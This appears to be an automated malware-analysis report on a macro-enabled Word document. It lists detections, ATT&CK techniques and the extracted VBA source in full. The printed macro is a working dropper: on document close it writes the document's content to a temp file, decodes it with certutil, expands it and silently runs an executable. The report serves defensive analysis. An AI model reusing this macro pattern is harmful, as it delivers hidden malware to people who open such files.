MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1140 Deobfuscate or Obfuscate
The VBA macro within this document utilizes WScript.Shell to execute a series of commands. It first writes obfuscated content to a temporary file, then uses certutil to decode it, expands the resulting archive, and finally executes 'VizorHtmlDialog.exe'. This sequence strongly suggests the document is a dropper designed to download and execute a second-stage payload.
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-6444387-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6444387-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
DGHjIKbFRghjH.Close Set uVFTyuiVGT = CreateObject("Wscript.Shell") uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Set uVFTyuiVGT = CreateObject("Wscript.Shell") uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True uVFTyuiVGT.Run "cmd.exe /c expand %temp%\\IcfRyFiuHdeU -F:* %temp%\\", 0, True -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set crHJUgVD = ActiveDocument.Range(1, IbRuVFdU) Set jIHiuHY = CreateObject("Scripting.FileSystemObject") Set DGHjIKbFRghjH = jIHiuHY.CreateTextFile(HYFRTghYcU, True) -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
Set uVFTyuiVGT = CreateObject("Wscript.Shell") uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True uVFTyuiVGT.Run "cmd.exe /c expand %temp%\\IcfRyFiuHdeU -F:* %temp%\\", 0, True -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Dim HYFRTghYcU As String HYFRTghYcU = Environ("temp") & "\HfRYgyugy" IbRuVFdU = ActiveDocument.Content.End -
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1173 bytes |
SHA-256: 9f95f200e7e05adfe6ecfa1795314ee053ac4f4ee6d4fc9da7c4440836c45304 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Dim IbRuVFdU As Long
Dim HYFRTghYcU As String
HYFRTghYcU = Environ("temp") & "\HfRYgyugy"
IbRuVFdU = ActiveDocument.Content.End
Set crHJUgVD = ActiveDocument.Range(1, IbRuVFdU)
Set jIHiuHY = CreateObject("Scripting.FileSystemObject")
Set DGHjIKbFRghjH = jIHiuHY.CreateTextFile(HYFRTghYcU, True)
DGHjIKbFRghjH.WriteLine (crHJUgVD)
DGHjIKbFRghjH.Close
Set uVFTyuiVGT = CreateObject("Wscript.Shell")
uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True
uVFTyuiVGT.Run "cmd.exe /c expand %temp%\\IcfRyFiuHdeU -F:* %temp%\\", 0, True
uVFTyuiVGT.Run "cmd.exe /c %temp%\\VizorHtmlDialog.exe", 0, False
Set uVFTyuiVGT = Nothing
Set jIHiuHY = Nothing
End Sub
Private Sub Document_New()
End Sub
Attribute VB_Name = "NewMacros"
Sub BYcuYIUGBTCFYGUGIKH()
'
' BYcuYIUGBTCFYGUGIKH Macro
'
'
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 12800 bytes |
SHA-256: 6cf527cc047be369117b6ba1634dbd02e311f8ae2b654026d27afcda2854d346 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.